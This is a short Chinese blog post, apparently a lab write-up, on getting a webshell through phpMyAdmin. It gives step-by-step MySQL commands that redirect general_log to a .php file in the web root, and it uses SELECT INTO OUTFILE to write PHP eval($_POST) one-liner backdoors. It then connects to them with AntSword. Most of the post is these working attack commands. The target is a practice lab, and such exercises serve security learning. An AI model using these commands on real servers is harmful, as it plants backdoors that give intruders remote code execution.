PhPMyadmin-cms漏洞复现

cr.sheeper2024-12-29 20:11

一.通过日志文件拿Shell

打开靶场连接数据库

来到sql中输入

复制代码 
show global variables like '%general%';
复制代码 
set global general_log='on'; //⽇志保存状态开启;
复制代码 
set global general_log_file = 'D:/phpstudy/phpstudy_pro/WWW/123.php'  //修改日志保存位置
复制代码 
show global variables like '%general%';
复制代码 
select '<?php eval($_POST[cmd]);?>';

看看是否能连接成功

二.导入导出拿webshell

输入select @@datadir我们可以看到mysql路径

所以我们推测web路径为D:/phpstudy/phpstudy_pro/WWW

复制代码 
select "<?php eval($_POST[a]);?>" into outfile 'D:/phpstudy/phpstudy_pro/WWW/666.php'

去访问

再用蚁剑连接一下试试

相关推荐
heze093 小时前
sqli-labs-Less-18自动化注入方法
mysql·网络安全·自动化
heze0913 小时前
sqli-labs-Less-19自动化注入方法
mysql·网络安全·自动化
网安CILLE13 小时前
Wireshark 抓包实战演示
linux·网络·python·测试工具·web安全·网络安全·wireshark
久违 °16 小时前
【安全开发】Nmap主机探测技术详解(一)
网络·安全·网络安全
Whoami!17 小时前
❿⁄₁₄ ⟦ OSCP ⬖ 研记 ⟧ 密码攻击实践 ➱ 传递Net-NTLMv2哈希
网络安全·信息安全·密码破解·ntlm哈希
周某人姓周17 小时前
sqli-labs注入靶场搭建与sql语句
sql·安全·网络安全
吉吉6118 小时前
文件包含之伪协议漏洞复现
web安全·网络安全
Bruce_Liuxiaowei18 小时前
解决 PowerShell 模块加载无响应问题的实用指南——Invoke-Obfuscation为例
windows·网络安全·内网渗透
tangyal1 天前
渗透笔记1
笔记·网络安全·渗透
吗喽1543451881 天前
渗透高级第一次作业(笔记整理)
笔记·安全·网络安全
热门推荐
01GitHub 镜像站点02OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)032025 Telegram 最新免费社工库机器人(LetsTG可[特殊字符])搭建指南(含 Python 脚本)04安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)05UV安装并设置国内源06Linux下V2Ray安装配置指南07AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南08BongoCat - 跨平台键盘猫动画工具09网站改了域名,如何查找?10Claude Code Skills 实用使用手册